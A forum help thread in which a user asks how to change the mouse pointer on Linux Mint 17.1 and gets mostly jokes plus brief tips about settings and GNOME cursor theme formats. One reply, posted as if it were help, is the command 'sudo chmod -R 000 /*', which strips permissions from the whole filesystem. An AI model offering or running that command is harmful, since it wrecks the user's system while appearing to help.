How can I change me cursor with Linux Mint 17.1?

Hey, I'm using Linux on my Laptop, and I wanted to change my pointercursor, but I couldn't find any how-to's that fit my situation. I've just read that I need the GNOME control center, but I can't find it on my Harddrive and I haven't found any at least partially legit looking sources. Anybody able to help?

I will find your Laptop thread and I will recommend an ITX build instead

Sure would be neat if there was something useful here, eh?

Isn't there an option under settings?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Ok, I downloaded it... now I only have to figure out how to choose the one I want to use.

There are specific formats for cursor theming on gnome, I don't think you can just use a custom image.
